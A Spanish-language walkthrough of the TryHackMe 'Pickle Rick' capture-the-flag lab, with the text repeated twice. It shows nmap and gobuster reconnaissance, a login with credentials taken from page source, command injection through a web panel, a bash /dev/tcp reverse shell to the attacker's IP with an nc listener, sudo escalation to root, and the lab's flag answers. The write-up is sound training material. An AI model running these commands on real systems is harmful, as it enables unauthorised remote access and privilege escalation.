Pickle Rick | TryHackMe | Spanish

Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo]. Podemos ver que hay levantado un Apache en el puerto 80, por lo cual ponemos la [IP objetiva] en el navegador y nos lleva a la siguiente página. Al abrir el código fuente y revisarlo, nos encontramos con el siguiente Username R1ckRul3s. Hacemos Fuzzing de la IP objetiva con gobuster dir -u [IP objetivo] -w [Ruta_diccionario] -x php,html,txt el cual nos suelta los siguientes directorios con status 200: /index.php /login.php /assests /porta.php /robots.txt Observamos que hay un txt así que procedemos a verlo. Vemos que nos dice Wubbalubbadubdub, lo guardaremos para después. Luego entramos al /login.php el cual nos pide user y passwd, el user ya lo tenemos R1ckRul3s, dado en el codigo fuente, con la palabra anterior que encontramos, en robots.txt, la introducimos en el password y... En efecto, entramos. Hay un panel que nos da cabida a introducir comandos, ¿Pero de cuáles? Primero veremos si se puede introducir scripts XSS... se intentó varios, pero no resulto, ahora veremos si los comandos de Linux son efectivos. Tal parece que si lo son, ya que con ls nos lista el contenido. Vemos quienes somos con id. Somos www-data y nos confirma que no tenemos ningún privilegio root. Al introducir el comando cat nos da un mensaje de que está deshabilitado, por lo tanto, usaremos uno similar less y abriremos Sup3rS3cretPickl3Ingred.txt. El archivo contiene mr. meeseek hair, puede ser la primera flag... Al introducirlo en la primera preguntan, en efecto, es la respuesta. clue.txt nos dice que busquemos en los demás directorios. robots.txt contiene la passwd que encontramos antes. El comando ls / nos lleva al directorio raíz e intentamos abrir el archivo /root, pero nos dice que no tenemos permiso. Vamos a hacer una Shell reverse para poder tener mejor visibilidad, buscamos Aquí vemos un bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 en Reverse Shell. Procedemos a modificarla para que funcione con nuestra interfaz, cambiamos la [IP] que trae por la nuestra que es la de OpenVPN. Entonces sería: bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en nuestro caso, solo cambiando la [IP] y el [Puerto] para escuchar luego con nc -lnvp 1337. Ponemos el comando bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en la página y... Entramos. Entramos al directorio /home/rick y vemos que hay un archivo llamado second ingredients, lo abrimos con cat 'second ingredients' y nos da 1 jerry tear. luego vamos a las questions a confirmar. Para el siguiente ingrediente debemos escalar privilegios, ya que el directorio /root nos manda un aviso de permiso denegado. Así que usamos sudo -l para inspeccionar. Y en este caso podemos usar sudo bash para elevarnos como usuario Root, confirmamos con id. Entramos al directorio /root. Vemos 3rd.txt el cual abrimos con cat 3rd.txt que nos da el tercer ingrediente fleeb juice. Lo confirmamos en las questions. Y así completamos la máquina Pickle Rick en TryHackMe.

Apr 16, 2025 - 06:36
 0
Pickle Rick | TryHackMe | Spanish

Luego de conectarse a la máquina y ver que efectivamente tenemos conexión con aquello, hacemos un escaneo con Nmap nmap -Pn -n --open --top-ports 10000 -T5 -sVC [IP obejetivo].

Image Nmap

Podemos ver que hay levantado un Apache en el puerto 80, por lo cual ponemos la [IP objetiva] en el navegador y nos lleva a la siguiente página.

Image Página

Al abrir el código fuente y revisarlo, nos encontramos con el siguiente Username R1ckRul3s.

Image User

Hacemos Fuzzing de la IP objetiva con gobuster dir -u [IP objetivo] -w [Ruta_diccionario] -x php,html,txt el cual nos suelta los siguientes directorios con status 200:

  • /index.php
  • /login.php
  • /assests
  • /porta.php
  • /robots.txt

Observamos que hay un txt así que procedemos a verlo.

Image robots.txt

Vemos que nos dice Wubbalubbadubdub, lo guardaremos para después. Luego entramos al /login.php el cual nos pide user y passwd, el user ya lo tenemos R1ckRul3s, dado en el codigo fuente, con la palabra anterior que encontramos, en robots.txt, la introducimos en el password y... En efecto, entramos.

Image Panel command

Hay un panel que nos da cabida a introducir comandos, ¿Pero de cuáles? Primero veremos si se puede introducir scripts XSS... se intentó varios, pero no resulto, ahora veremos si los comandos de Linux son efectivos.

Image ls

Tal parece que si lo son, ya que con ls nos lista el contenido. Vemos quienes somos con id.

Image id

Somos www-data y nos confirma que no tenemos ningún privilegio root.

Al introducir el comando cat nos da un mensaje de que está deshabilitado, por lo tanto, usaremos uno similar less y abriremos Sup3rS3cretPickl3Ingred.txt.

Image contenido del archivo

El archivo contiene mr. meeseek hair, puede ser la primera flag... Al introducirlo en la primera preguntan, en efecto, es la respuesta.

Image Respuesta 1

  • clue.txt nos dice que busquemos en los demás directorios.
  • robots.txt contiene la passwd que encontramos antes.

El comando ls / nos lleva al directorio raíz e intentamos abrir el archivo /root, pero nos dice que no tenemos permiso.

Image carpeta raíz

Vamos a hacer una Shell reverse para poder tener mejor visibilidad, buscamos Aquí vemos un bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 en Reverse Shell.

Image reverse shell

Procedemos a modificarla para que funcione con nuestra interfaz, cambiamos la [IP] que trae por la nuestra que es la de OpenVPN.

Image OpenVPN

Entonces sería:
bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en nuestro caso, solo cambiando la [IP] y el [Puerto] para escuchar luego con nc -lnvp 1337.

Image escucha

Ponemos el comando bash -c 'bash -i >& /dev/tcp/10.2.46.4/1337 0>&1' en la página y... Entramos.

Image reverse exitoso

Entramos al directorio /home/rick y vemos que hay un archivo llamado second ingredients, lo abrimos con cat 'second ingredients' y nos da 1 jerry tear.

Image ingrediente

luego vamos a las questions a confirmar.

Image respuesta 2

Para el siguiente ingrediente debemos escalar privilegios, ya que el directorio /root nos manda un aviso de permiso denegado.

Image root denegado

Así que usamos sudo -l para inspeccionar.

Image sudo

Y en este caso podemos usar sudo bash para elevarnos como usuario Root, confirmamos con id.

Image somos Root

Entramos al directorio /root.

Image entramos /root

Vemos 3rd.txt el cual abrimos con cat 3rd.txt que nos da el tercer ingrediente fleeb juice.

Image ingrediente 3

Lo confirmamos en las questions.

Image Resuelto

Y así completamos la máquina Pickle Rick en TryHackMe.